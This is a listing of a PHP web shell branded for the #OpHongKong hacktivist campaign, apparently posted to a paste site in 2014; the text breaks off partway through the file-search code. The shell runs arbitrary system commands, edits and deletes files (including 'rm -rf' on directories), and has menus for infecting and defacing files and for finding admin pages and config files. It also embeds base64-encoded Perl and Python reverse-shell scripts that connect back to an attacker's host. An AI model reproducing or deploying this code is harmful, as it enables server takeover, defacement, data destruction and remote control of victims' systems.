
Oct 7th, 2014
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  1. <!---
  2. # Official shell of #OpHongKong
  3. # Shell By - @t3chfl4r3
  4. #
  5. #
  6. #
  7. --->
  9. <title>~ #OpHongKong ~</title>
  10. <link rel="shortcut icon" type="image/png" href="http://tinyurl.com/nvd8n8g"/>
  12. <?php
  14. @ini_set("memory_limit", "9999M");
  15. @ini_set("max_execution_time", "0");
  16. @ini_set("upload_max_filesize", "9999m");
  17. @ini_set("magic_quotes_gpc", "0");
  18. @set_magic_quotes_runtime(0);
  19. @set_time_limit(0);
  20. error_reporting(0);
  22. //Style Variables
  23. $fontcolor = "FF0000";
  24. $fontsize = "12px";
  25. $fontfamily = "courier";
  26. $fontweight = "normal";
  27. $tablebordercolor = "#000000";
  28. $tablebgcolor = "#000000";
  29. $tablehovercolor = "#141414";
  30. $textareabgcolor = "#000000";
  31. $textareafontcolor = "#FF0000";
  32. $textareabordercolor = "#FF0000";
  33. $inputbgcolor = "#000000";
  34. $inputfontcolor = "#FF0000";
  35. $inputbordercolor = "#FF0000";
  36. $linkcolor = "#FFFFFF";
  37. $activelinkcolor = "#FF0000";
  38. $hoverlinkcolor = "#FF0000";
  39. $visitedlinkcolor = "#FFFFFF";
  40. $contentpadding = "10px";
  41. $containerbordercolor = "#FF0000";
  43. //Other Variables
  44. $version = "#OpHongKong";
  45. $yourip = $_SERVER['REMOTE_ADDR'];
  46. $whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exe_cmd("whoami");
  47. $whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exe_cmd("whoami");
  48. $uname = php_uname();
  49. $serversoftware = $_SERVER['SERVER_SOFTWARE'];
  50. $gatewayinterface = $_SERVER['GATEWAY_INTERFACE'];
  51. $servername = $_SERVER['SERVER_NAME'];
  52. $serverip = $_SERVER['SERVER_ADDR'];
  53. $safemode = ini_get('safe_mode') ? "Enabled" : "Disabled";
  54. $openbasedir = ini_get('open_basedir') ? "Enabled" : "Disabled";
  55. $disabledfunc = ini_get('disable_functions');
  56. $phpversion = phpversion();
  57. $domain = $_SERVER['HTTP_HOST'];
  58. $rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
  59. $syscoms = array('system', 'shell_exec', 'proc_open', 'passthru', 'exec');
  60. $compression = array('zip', 'tar', 'tar.gz', 'tgz', 'gz', 'rar');
  62. $bcpl = "IyEvdXNyL2Jpbi9wZXJsIC13DQojIHBlcmwtcmV2ZXJzZS1zaGVsbCAtIEEgUmV2ZXJzZSBTaGVsbCBpbXBsZW1lbnRhdGlvbiBpbiBQRVJMDQojIENvcHlyaWdodCAoQykgMjAwNiBwZW50ZXN0bW9ua2V5QHBlbnRlc3Rtb25rZXkubmV0DQojDQojIEFkZGVkIGNvbW1hbmQgbGluZSBhcmd1bWVudHMgZm9yIGVhc3kgZXhlY3V0aW9uIH4gUGx1bQ0KIyBTb3JyeSBhYm91dCByZW1vdmluZyB0aGUgcmVzdCBvZiB0aGUgY29tbWVudHMuIA0KIyBUcnlpbmcgdG8gc2F2ZSBhcyBtdWNoIHNwYWNlIGFzIHBvc3NpYmxlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQp1c2Ugc3RyaWN0Ow0KdXNlIFNvY2tldDsNCnVzZSBGaWxlSGFuZGxlOw0KdXNlIFBPU0lYOw0KbXkgJFZFUlNJT04gPSAiMS4wIjsNCm15ICRBUkdDPUBBUkdWOw0KDQojQ2hlY2sgaWYgYXJndW1lbnRzIGV4aXN0DQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQoNCiMgV2hlcmUgdG8gc2VuZCB0aGUgcmV2ZXJzZSBzaGVsbC4gIENoYW5nZSB0aGVzZS4NCm15ICRpcCA9ICRBUkdWWzBdOw0KbXkgJHBvcnQgPSAkQVJHVlsxXTsNCg0KIyBPcHRpb25zDQpteSAkZGFlbW9uID0gMTsNCm15ICRhdXRoICAgPSAwOyAjIDAgbWVhbnMgYXV0aGVudGljYXRpb24gaXMgZGlzYWJsZWQgYW5kIGFueSANCgkJIyBzb3VyY2UgSVAgY2FuIGFjY2VzcyB0aGUgcmV2ZXJzZSBzaGVsbA0KbXkgJGF1dGhvcmlzZWRfY2xpZW50X3BhdHRlcm4gPSBxciheMTI3XC4wXC4wXC4xJCk7DQoNCiMgRGVjbGFyYXRpb25zDQpteSAkZ2xvYmFsX3BhZ2UgPSAiIjsNCm15ICRmYWtlX3Byb2Nlc3NfbmFtZSA9ICIvdXNyL3NiaW4vYXBhY2hlIjsNCg0KIyBDaGFuZ2UgdGhlIHByb2Nlc3MgbmFtZSB0byBiZSBsZXNzIGNvbnNwaWNpb3VzDQokMCA9ICJbaHR0cGRdIjsNCg0KIyBBdXRoZW50aWNhdGUgYmFzZWQgb24gc291cmNlIElQIGFkZHJlc3MgaWYgcmVxdWlyZWQNCmlmIChkZWZpbmVkKCRFTlZ7J1JFTU9URV9BRERSJ30pKSB7DQoJY2dpcHJpbnQoIkJyb3dzZXIgSVAgYWRkcmVzcyBhcHBlYXJzIHRvIGJlOiAkRU5WeydSRU1PVEVfQUREUid9Iik7DQoNCglpZiAoJGF1dGgpIHsNCgkJdW5sZXNzICgkRU5WeydSRU1PVEVfQUREUid9ID1+ICRhdXRob3Jpc2VkX2NsaWVudF9wYXR0ZXJuKSB7DQoJCQljZ2lwcmludCgiRVJST1I6IFlvdXIgY2xpZW50IGlzbid0IGF1dGhvcmlzZWQgdG8gdmlldyB0aGlzIHBhZ2UiKTsNCgkJCWNnaWV4aXQoKTsNCgkJfQ0KCX0NCn0gZWxzaWYgKCRhdXRoKSB7DQoJY2dpcHJpbnQoIkVSUk9SOiBBdXRoZW50aWNhdGlvbiBpcyBlbmFibGVkLCBidXQgSSBjb3VsZG4ndCBkZXRlcm1pbmUgeW91ciBJUCBhZGRyZXNzLiAgRGVueWluZyBhY2Nlc3MiKTsNCgljZ2lleGl0KDApOw0KfQ0KDQojIEJhY2tncm91bmQgYW5kIGRpc3NvY2lhdGUgZnJvbSBwYXJlbnQgcHJvY2VzcyBpZiByZXF1aXJlZA0KaWYgKCRkYWVtb24pIHsNCglteSAkcGlkID0gZm9yaygpOw0KCWlmICgkcGlkKSB7DQoJCWNnaWV4aXQoMCk7ICMgcGFyZW50IGV4aXRzDQoJfQ0KDQoJc2V0c2lkKCk7DQoJY2hkaXIoJy8nKTsNCgl1bWFzaygwKTsNCn0NCg0KIyBNYWtlIFRDUCBjb25uZWN0aW9uIGZvciByZXZlcnNlIHNoZWxsDQpzb2NrZXQoU09DSywgUEZfSU5FVCwgU09DS19TVFJFQU0sIGdldHByb3RvYnluYW1lKCd0Y3AnKSk7DQppZiAoY29ubmVjdChTT0NLLCBzb2NrYWRkcl9pbigkcG9ydCxpbmV0X2F0b24oJGlwKSkpKSB7DQoJY2dpcHJpbnQoIlNlbnQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsNCgljZ2lwcmludHBhZ2UoKTsNCn0gZWxzZSB7DQoJY2dpcHJpbnQoIkNvdWxkbid0IG9wZW4gcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQ6ICQhIik7DQoJY2dpZXhpdCgpOwkNCn0NCg0KIyBSZWRpcmVjdCBTVERJTiwgU1RET1VUIGFuZCBTVERFUlIgdG8gdGhlIFRDUCBjb25uZWN0aW9uDQpvcGVuKFNURElOLCAiPiZTT0NLIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLIik7DQpvcGVuKFNUREVSUiwiPiZTT0NLIik7DQokRU5WeydISVNURklMRSd9ID0gJy9kZXYvbnVsbCc7DQpzeXN0ZW0oInc7dW5hbWUgLWE7aWQ7cHdkIik7DQpleGVjKHsiL2Jpbi9zaCJ9ICgkZmFrZV9wcm9jZXNzX25hbWUsICItaSIpKTsNCg0KIyBXcmFwcGVyIGFyb3VuZCBwcmludA0Kc3ViIGNnaXByaW50IHsNCglteSAkbGluZSA9IHNoaWZ0Ow0KCSRsaW5lIC49ICI8cD5cbiI7DQoJJGdsb2JhbF9wYWdlIC49ICRsaW5lOw0KfQ0KDQojIFdyYXBwZXIgYXJvdW5kIGV4aXQNCnN1YiBjZ2lleGl0IHsNCgljZ2lwcmludHBhZ2UoKTsNCglleGl0IDA7ICMgMCB0byBlbnN1cmUgd2UgZG9uJ3QgZ2l2ZSBhIDUwMCByZXNwb25zZS4NCn0NCg0KIyBGb3JtIEhUVFAgcmVzcG9uc2UgdXNpbmcgYWxsIHRoZSBtZXNzYWdlcyBnYXRoZXJlZCBieSBjZ2lwcmludCBzbyBmYXINCnN1YiBjZ2lwcmludHBhZ2Ugew0KCXByaW50ICJDb250ZW50LUxlbmd0aDogIiAuIGxlbmd0aCgkZ2xvYmFsX3BhZ2UpIC4gIlxyDQpDb25uZWN0aW9uOiBjbG9zZVxyDQpDb250ZW50LVR5cGU6IHRleHRcL2h0bWxcclxuXHJcbiIgLiAkZ2xvYmFsX3BhZ2U7DQp9";
  63. $bcpy = "IyEgL3Vzci9iaW4vZW52IHB5dGhvbg0KDQojIENvcHlyaWdodCAoYykgMjAxMSBYYXZpZXIgR2FyY2lhIHd3dy5zaGVsbGd1YXJkaWFucy5jb20NCiMgQWxsIHJpZ2h0cyByZXNlcnZlZC4NCiMNCiMgIEJhc2VkIG9uIHRoZSBQeXRob24gY29ubmVjdCBiYWNrIHNoZWxsIHdyaXR0ZW4gYnkgRGF2aWQgS2VubmVkeQ0KIyAgaHR0cDovL3d3dy5zZWNtYW5pYWMuY29tL2p1bmUtMjAxMS9jcmVhdGluZy1hLTEzLWxpbmUtYmFja2Rvb3Itd29ycnktZnJlZS1vZi1hdi8NCiMNCiMgQWRkZWQgY29tbWFuZCBsaW5lIGFyZ3VtZW50cyBmb3IgZWFzeSBleGVjdXRpb24NCiMgU29ycnkgYWJvdXQgcmVtb3ZpbmcgdGhlIHJlc3Qgb2YgdGhlIGNvbW1lbnRzDQojIFRyeWluZyB0byBzYXZlIHNwYWNlIGFzIHRoaXMgd2lsbCBiZSBiYXNlNjQnZA0KDQppbXBvcnQgc29ja2V0DQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCg0KaWYgbGVuKHN5cy5hcmd2KSA8IDM6DQoJcHJpbnQoJ1VzYWdlOiBweXRob24gJytzeXMuYXJndlswXSsnIDxJUD4gPFBPUlQ+JykNCglwcmludCgnRXhhbXBsZTogcHl0aG9uICcrc3lzLmFyZ3ZbMF0rJyAxMjcuMC4wLjEgMjEyMScpDQoJc3lzLmV4aXQoKQ0KDQpIT1NUID0gc3lzLmFyZ3ZbMV0gICAgIyBUaGUgcmVtb3RlIGhvc3QNClBPUlQgPSBpbnQoc3lzLmFyZ3ZbMl0pICAgIyBUaGUgc2FtZSBwb3J0IGFzIHVzZWQgYnkgdGhlIHNlcnZlcg0KDQpkZWYgY29ubmVjdCgoaG9zdCwgcG9ydCkpOg0KCXMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQoJcy5jb25uZWN0KChob3N0LCBwb3J0KSkNCglyZXR1cm4gcw0KDQpkZWYgd2FpdF9mb3JfY29tbWFuZChzKToNCglkYXRhID0gcy5yZWN2KDEwMjQpDQoJaWYgZGF0YSA9PSAiZXhpdFxuIjoNCgkJcy5jbG9zZSgpDQoJCXN5cy5leGl0KDApDQoJIyB0aGUgc29ja2V0IGRpZWQNCgllbGlmIGxlbihkYXRhKT09MDoNCgkJcmV0dXJuIFRydWUNCgllbHNlOg0KCQkjIGRvIHNoZWxsIGNvbW1hbmQNCgkJcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oZGF0YSwgc2hlbGw9VHJ1ZSwNCgkJCXN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsDQoJCQlzdGRpbj1zdWJwcm9jZXNzLlBJUEUpDQoJCSMgcmVhZCBvdXRwdXQNCgkJc3Rkb3V0X3ZhbHVlID0gcHJvYy5zdGRvdXQucmVhZCgpICsgcHJvYy5zdGRlcnIucmVhZCgpDQoJCSMgc2VuZCBvdXRwdXQgdG8gYXR0YWNrZXINCgkJcy5zZW5kKHN0ZG91dF92YWx1ZSkNCgkJcmV0dXJuIEZhbHNlDQoNCmRlZiBtYWluKCk6DQoJd2hpbGUgVHJ1ZToNCgkJc29ja2VkX2RpZWQ9RmFsc2UNCgkJdHJ5Og0KCQkJcz1jb25uZWN0KChIT1NULFBPUlQpKQ0KCQkJd2hpbGUgbm90IHNvY2tlZF9kaWVkOg0KCQkJCXNvY2tlZF9kaWVkPXdhaXRfZm9yX2NvbW1hbmQocykNCgkJCXMuY2xvc2UoKQ0KCQlleGNlcHQgc29ja2V0LmVycm9yOg0KCQkJcGFzcw0KCQl0aW1lLnNsZWVwKDUpDQoNCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6DQoJc3lzLmV4aXQobWFpbigpKQ==";
  65. //Tab Options Layout
  66. $currentfile = basename(__FILE__);
  67. $tabs = array(
  68. "System"=> array(
  69. "CPU" => "./".$currentfile."?cpu",
  70. "Users" => "./".$currentfile."?users",
  71. "Memory" => "./".$currentfile."?memory",
  72. "Processes" => "./".$currentfile."?processes"
  73. ),
  74. "Mass Editor" => array(
  75. "Infect Files" => "./".$currentfile."?fileInfect",
  76. "Deface Files" => "./".$currentfile."?fileDeface"
  77. ),
  78. "Back Connect" => array(
  79. "PHP" => "./".$currentfile."?bcPHP",
  80. "Perl" => "./".$currentfile."?bcPerl",
  81. "Python" => "./".$currentfile."?bcPython"
  82. ),
  83. "Shell" => array(
  84. "Kill" => "./".$currentfile."?kill",
  85. "Credits" => "./".$currentfile."?credits",
  86. "Check Links" => "./".$currentfile."?checkLinks"
  87. ),
  88. "Extras" => array(
  89. "Reverse IP" => "./".$currentfile."?reverseIP",
  90. "Hash Generator" => "./".$currentfile."?hashGenerator"
  91. ),
  92. "Search" => array(
  93. "Admin Finder" => "./".$currentfile."?adminFinder",
  94. "Config Finder" => "./".$currentfile."?configFinder",
  95. "Search Files/Dir" => "./".$currentfile."?search"
  96. )
  97. );
  99. $links = array(
  100. "BOOTSTRAPCSS" => array(
  101. "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css",
  102. "MD5" => "5ed756c76e52bcf521040ff09a01f3f3",
  103. "DESC" => "Bootstrap Nav Bar CSS"
  104. ),
  105. "BOOTSTRAPJS" => array(
  106. "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js",
  107. "MD5" => "be4478613ae8c0bb1b799e6b340519e4",
  108. "DESC" => "Bootstrap Dropdown JS"
  109. ),
  110. "BACKGROUND" => array(
  111. "LINK" => "https://pbs.twimg.com/profile_images/1773564270/anonymous-logo-1.jpg",
  112. "MD5" => "bb87b9287906b2cde47fd18680e4f00d",
  113. "DESC" => "Background Image"
  114. )
  115. );
  117. if(!@$_GET['dir']) {
  118. $dir = CleanDir(getcwd());
  119. } else {
  120. $dir = CleanDir($_GET['dir']);
  121. }
  123. function CleanDir($directory) {
  124. $directory = str_replace("\\", "/", $directory);
  125. $directory = str_replace("//", "/", $directory);
  126. return $directory;
  127. }
  129. function ByteConversion($bytes, $precision = 2) {
  130. $kilobyte = 1024;
  131. $megabyte = $kilobyte * 1024;
  132. $gigabyte = $megabyte * 1024;
  133. $terabyte = $gigabyte * 1024;
  135. if (($bytes >= 0) && ($bytes < $kilobyte)) {
  136. return $bytes . ' B';
  137. } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
  138. return round($bytes / $kilobyte, $precision) . ' KB';
  139. } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
  140. return round($bytes / $megabyte, $precision) . ' MB';
  141. } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
  142. return round($bytes / $gigabyte, $precision) . ' GB';
  143. } elseif ($bytes >= $terabyte) {
  144. return round($bytes / $terabyte, $precision) . ' TB';
  145. } else {
  146. return $bytes . ' B';
  147. }
  148. }
  150. function success($message) {
  151. echo "<center><font color='green' size='5'><b>$message</b></font></center>";
  152. }
  154. function error($message) {
  155. echo "<center><font color='red' size='5'><b>$message</b></font></center>";
  156. }
  158. function redirect($url) {
  159. echo "<script>window.location = '$url';</script>";
  160. }
  162. function mass_files($mass_dir, $justdirs) {
  163. if($dh = opendir($mass_dir)) {
  164. $files = array();
  165. $inner_files = array();
  166. while($file = readdir($dh)) {
  167. if($file != "." && $file != ".." && $file[0] != '.') {
  168. if(is_dir($mass_dir . "/" . $file)) {
  169. $inner_files = mass_files("$mass_dir/$file", $justdirs);
  170. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  171. if($justdirs) { array_push($files, "$mass_dir/$file"); }
  172. } else {
  173. if(!$justdirs) { array_push($files, "$mass_dir/$file"); }
  174. }
  175. }
  176. }
  177. closedir($dh);
  178. return $files;
  179. }
  180. }
  182. function can_exe() {
  183. global $disabledfunc;
  184. global $syscoms;
  185. $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc));
  186. if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) {
  187. return false;
  188. } else {
  189. return true;
  190. }
  191. }
  193. function exe_cmd($command) {
  194. global $dir;
  195. chdir($dir);
  196. if(function_exists('proc_open')) {
  197. $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
  198. $result = "";
  199. while (!feof($io[1])) {
  200. $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
  201. }
  202. while (!feof($io[2])) {
  203. $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
  204. }
  205. fclose($io[1]);
  206. fclose($io[2]);
  207. proc_close($execute);
  208. return $result;
  209. } elseif(function_exists('system')) {
  210. $result = system($command);
  211. return $result;
  212. } elseif(function_exists('exec')) {
  213. $result = exec($command);
  214. return $result;
  215. } elseif(functions_exists('shell_exec')) {
  216. $result = shell_exec($command);
  217. return $result;
  218. } elseif(function_exists('passthru')) {
  219. $result = passthru($command);
  220. return $result;
  221. }
  222. }
  224. function salt_gen($length) {
  225. $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9");
  226. $i = 0;
  227. $salt = "";
  228. while($i < $length) {
  229. $arrand = array_rand($characters, 1);
  230. $salt .= $characters[$arrand];
  231. $i++;
  232. }
  233. return $salt;
  234. }
  236. function extract_file($filepath, $extractpath, $type) {
  237. if($type == 'zip') {
  238. if(class_exists('ZipArchive')) {
  239. $newzip = new ZipArchive;
  240. $open = $newzip->open($filepath);
  241. if($open == true) {
  242. $newzip->extractTo($extractpath);
  243. $newzip->close();
  244. redirect("?dir=$extractpath");
  245. } else {
  246. error('Failed to open zip archive!');
  247. }
  248. } else {
  249. if(can_exe()) {
  250. error('ZipArchive class does not exist!<br>Trying to extract via sys commands');
  251. echo "<center>
  252. The response from 'unzip $filepath -d $extractpath' was:<br>
  253. <textarea rows='10' cols='85' readonly>".exe_cmd("unzip $filepath -d $extractpath")."</textarea>
  254. </center>";
  255. } else {
  256. error('Zip archive does not exist and commands can not be executed!');
  257. }
  258. }
  259. } elseif($type == 'tar') {
  260. if(class_exists('PharData')) {
  261. $newphar = new PharData($filepath);
  262. $newphar->extractTo($extractpath);
  263. unlink($filepath);
  264. redirect("?dir=$extractpath");
  265. } else {
  266. if(can_exe()) {
  267. error('PharData class does not exist!<br>Trying to extract via sys commands');
  268. echo "<center>
  269. The response from 'tar xvf $filepath -C $extractpath' was:<br>
  270. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvf $filepath -C $extractpath")."</textarea>
  271. </center>";
  272. } else {
  273. error('PharData class does not exist and commands can not be executed!');
  274. }
  275. }
  276. } elseif($type == 'gz') {
  277. if(function_exists('gzopen')) {
  278. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
  279. $open = gzopen($filepath, "rb");
  281. while($contents = gzread($open, 4096)) {
  282. file_put_contents($decomname, $contents, FILE_APPEND);
  283. }
  284. gzclose($open);
  285. redirect("?dir=$extractpath");
  286. } else {
  287. if(can_exe()) {
  288. $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME));
  289. error('Zlib does not seem to be enabled!<br>Trying to extract via sys commands.');
  290. echo "<center>
  291. The response from 'gunzip -c $filepath > $decomname' was:<br>
  292. <textarea rows='10' cols='85' readonly>".exe_cmd("gunzip -c $filepath > $decomname")."</textarea>
  293. </center>";
  294. } else {
  295. error('Zlib does not seem to be enabled and commands can not be executed!');
  296. }
  297. }
  298. } elseif($type == 'tgz') {
  299. if(class_exists('PharData')) {
  300. $newphar = new PharData($filepath);
  301. $newphar->decompress();
  303. $newphar = new PharData(str_replace(".tgz", ".tar", $filepath));
  304. $newphar->extractTo($extractpath);
  305. unlink($filepath);
  306. unlink(str_replace(".tgz", ".tar", $filepath));
  307. redirect("?dir=$extractpath");
  308. } else {
  309. if(can_exe()) {
  310. error('PharData class does not exist!<br>Trying to extract via sys commands.');
  311. echo "<center>
  312. The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:<br>
  313. <textarea rows='10' cols='85' readonly>".exe_cmd("tar xvfz $filepath -C $extractpath && rm $filepath")."</textarea>
  314. </center>";
  315. } else {
  316. error('PharData class does not exist and commands can not be executed!');
  317. }
  318. }
  319. } elseif($type == 'rar') {
  320. if(class_exists('RarArchive')) {
  321. $openrar = RarArchive::open($filepath);
  323. if($raropen == true) {
  324. $entries = $openrar->getEntries();
  325. foreach($entries as $files) {
  326. $files->extract($extractpath);
  327. }
  328. $openrar->close();
  329. } else {
  330. error('Failed to open rar file!');
  331. $openrar->close();
  332. }
  333. } else {
  334. if(can_exe()) {
  335. error('RarArchive class does not exist!<br>Trying to extract via sys commands.');
  336. echo "<center>
  337. The response from 'unrar x $filepath $extractpath' was:<br>
  338. <textarea rows='10' cols='85' readonly>".exe_cmd("unrar x $filepath $extractpath")."</textarea>
  339. </center>";
  340. } else {
  341. error('RarArchive class does not exist and commands can not be executed!');
  342. }
  343. }
  344. }
  345. }
  347. //Initialize StyleSheet
  348. echo "
  349. <link rel='stylesheet' href='".$links['BOOTSTRAPCSS']['LINK']."'>
  350. <script src='//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js'></script>
  351. <script src='".$links['BOOTSTRAPJS']['LINK']."'></script>
  352. <style>
  353. body {
  354. background: #141414 url('".$links['BACKGROUND']['LINK']."');
  355. color: $fontcolor;
  356. padding-top: 100px !important;
  357. margin:0;
  358. font-family:$fontfamily;
  359. font-size:$fontsize;
  360. font-weight:$fontweight;
  361. background-size: 50%;
  362. }
  363. #container {
  364. width: 500px;
  365. border-color: $containerboredercolor;
  366. margin-left: auto;
  367. margin-right: auto;
  368. }
  369. #content {
  370. background-color: black;
  371. border: 1px solid #000000;
  372. padding: $contentpadding;
  373. }
  374. #container1 {
  375. width: 250px;
  376. border-color: $containerboredercolor;
  377. margin-left: auto;
  378. margin-right: auto;
  379. }
  380. #content1 {
  381. background-color: black;
  382. border-color: #FF0000;
  383. border: 1px solid #000000;
  384. padding: 5px;
  385. }
  386. table{
  387. border-color: $tablebordercolor;
  388. background-color: $tablebgcolor;
  389. opacity: 0.9;
  390. }
  391. #hover tr:hover{
  392. background-color: $tablehovercolor;
  393. }
  394. textarea {
  395. background-color: $textareabgcolor;
  396. resize:none;
  397. color: $textareafontcolor;
  398. border-color: $textareabordercolor;
  399. outline: none;
  400. }
  401. input {
  402. background-color: $inputbgcolor;
  403. resize:none;
  404. color: $inputfontcolor;
  405. border-color: $inputbordercolor;
  406. outline: none;
  407. }
  408. a:link {color: $linkcolor; text-decoration: none; }
  409. a:active {color: $activelinkcolor; text-decoration: none; }
  410. a:visited {color: $visitedlinkcolor; text-decoration: none; }
  411. a:hover {color: $hoverlinkcolor; text-decoration: none; }
  412. </style>";
  414. //Let's display nav bar
  415. echo <<<html
  416. <script>
  417. $(window).load(function(){
  418. $('#topbar').dropdown();
  419. });
  420. </script>
  421. <div class="topbar" id="topbar">
  422. <div class="fill">
  423. <div class="container">
  424. <a class="brand" href="./$currentfile">Home</a>
  425. <ul class="nav">
  426. html;
  427. foreach($tabs as $title => $link) {
  428. if(is_array($link)) {
  429. echo '<li class="menu">
  430. <a href="#" class="menu">'.$title.'</a>
  431. <ul class="menu-dropdown">';
  432. foreach($link as $dtitle => $dlink) {
  433. echo "<li><a href='$dlink'>$dtitle</a></li>";
  434. }
  435. echo "</ul>";
  436. } else {
  437. echo "<li><a href='$link'>$title</a></li>";
  438. }
  439. }
  440. echo <<<html
  441. </ul>
  442. </div>
  443. </div>
  444. </div>
  445. html;
  447. //#OpHongKong Banner
  448. echo "<center>
  449. <span><font color='#FF0000' size='35'><b>Official #OpHongKong Shell</b></font></span>
  450. <br>
  451. <br>
  452. <br>
  453. <center>";
  455. //Let's display system bar
  456. if(empty($disabledfunc)) {
  457. $disabledfun = "None";
  458. } else {
  459. $count = count(explode(",", $disabledfunc));
  460. $disabledfun = "<a href='?disabledFunctions'>$count functions disabled</a>";
  461. }
  462. echo <<<html
  463. <table width="75%" border="1">
  464. <tr>
  465. <th>Your IP</th>
  466. <th>User</th>
  467. <th>System</th>
  468. <th>Server Software</th>
  469. <th>Gateway Interface</th>
  470. <th>PHP Version</th>
  471. <th>Server Name</th>
  472. <th>Server IP</th>
  473. <th>safe_mode</th>
  474. <th>open_basedir</th>
  475. <th>Disabled Functions</th>
  476. </tr>
  477. <tr>
  478. <td>$yourip</td>
  479. <td>$whoami</td>
  480. <td>$uname</td>
  481. <td>$serversoftware</td>
  482. <td>$gatewayinterface</td>
  483. <td>$phpversion</td>
  484. <td>$servername</td>
  485. <td>$serverip</td>
  486. <td>$safemode</td>
  487. <td>$openbasedir</td>
  488. <td>$disabledfun</td>
  489. </tr>
  490. </table><br><br>
  491. html;
  493. //Read & Edit File
  494. if(isset($_POST['save_file'])) {
  495. $file = $_GET['edit'];
  496. $newcontent = $_POST['edit_file'];
  497. if(get_magic_quotes_gpc()) {
  498. $newcontent = stripslashes($newcontent);
  499. }
  500. if(file_put_contents($file, $newcontent)) {
  501. success("File has been saved successfully!");
  502. } else {
  503. error("File was not saved successfully!");
  504. }
  505. }
  506. if(isset($_POST['delete_file'])) {
  507. $file = $_GET['edit'];
  508. if(unlink($file)) {
  509. success("File was successfully deleted!");
  510. } else {
  511. error("File could not be deleted successfully!");
  512. }
  513. }
  515. if(isset($_GET['delF'])) {
  516. $file = $_GET['delF'];
  517. if(unlink($file)) {
  518. success("File was successfully deleted!");
  519. } else {
  520. error("File could not be deleted successfully!");
  521. }
  522. }
  524. if(isset($_GET['delD'])) {
  525. $ddir = $_GET['delD'];
  526. if(can_exe()) {
  527. echo "<center>
  528. The response from 'rm -rf $ddir' was:<br>
  529. <textarea cols='120' rows='20'>".exe_cmd("rm -rf $ddir")."</textarea>
  530. </center>";
  531. } else {
  532. if(rmdir($ddir)) {
  533. success("Directory successfully deleted!");
  534. } else {
  535. error("Failed to delete directory!");
  536. }
  537. }
  538. }
  540. if(isset($_GET['edit'])) {
  541. $file = $_GET['edit'];
  542. if(file_exists($file)) {
  543. $content = htmlspecialchars(file_get_contents($file));
  544. if(!is_writeable($file)) {
  545. echo "<center>
  546. <font color='red' size=5>This file is read only!</font><br>
  547. <textarea cols='120' rows='25' name='edit_file' readonly >$content</textarea>
  548. </center>";
  549. } else {
  550. echo "<center>
  551. <form action='' method='post'>
  552. <textarea cols='120' rows='25' name='edit_file'>$content</textarea><br>
  553. <input type='submit' name='save_file' value='Save'>
  554. <input type='submit' name='delete_file' value='Delete'>
  555. </form>
  556. </center>";
  557. }
  558. } else {
  559. error("File does not exist!");
  560. }
  561. }
  563. //Rename File
  564. if(isset($_POST['rename'])) {
  565. $newname = $_POST['new_name'];
  566. $oldname = $_GET['rename'];
  567. $rdir = $_GET['rdir'];
  568. if(rename("$rdir/$oldname", "$rdir/$newname")) {
  569. success("File was successfully renamed to: $newname");
  570. } else {
  571. error("File was not renamed!");
  572. }
  573. }
  575. if(isset($_GET['rename'])) {
  576. $oldname = $_GET['rename'];
  577. echo "<center>
  578. <form action='' method='post'>
  579. Rename: <input type='text' name='new_name' value='$oldname'>
  580. <input type='submit' name='rename' value='rename'>
  581. </form>
  582. </center>";
  583. }
  585. //Search Files and Directories
  586. if(isset($_GET['search'])) {
  587. echo "<center>
  588. <form action='' method='post'>
  589. Search for value in file and directory names.<br>
  590. Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
  591. Value to search for: <input type='text' name='search_val'><br>
  592. <input type='submit' name='search' value='Search'>
  593. </form>
  594. </center>";
  595. }
  596. if(isset($_POST['search'])) {
  597. $searchdir = $_POST['search_dir'];
  598. $searchval = $_POST['search_val'];
  599. echo "Search results that contain '$searchval' in file names.<br>";
  600. foreach(mass_files($searchdir, false) as $key => $filename) {
  601. $basename = pathinfo($filename, PATHINFO_BASENAME);
  602. if(preg_match('/'.$searchval.'/', $basename)) {
  603. echo "<a href='?edit=$filename'>$filename</a><br>";
  604. }
  605. }
  606. echo "<br>Search results that contain '$searchval' in directory names.<br>";
  607. foreach(mass_files($searchdir, true) as $key => $dirname) {
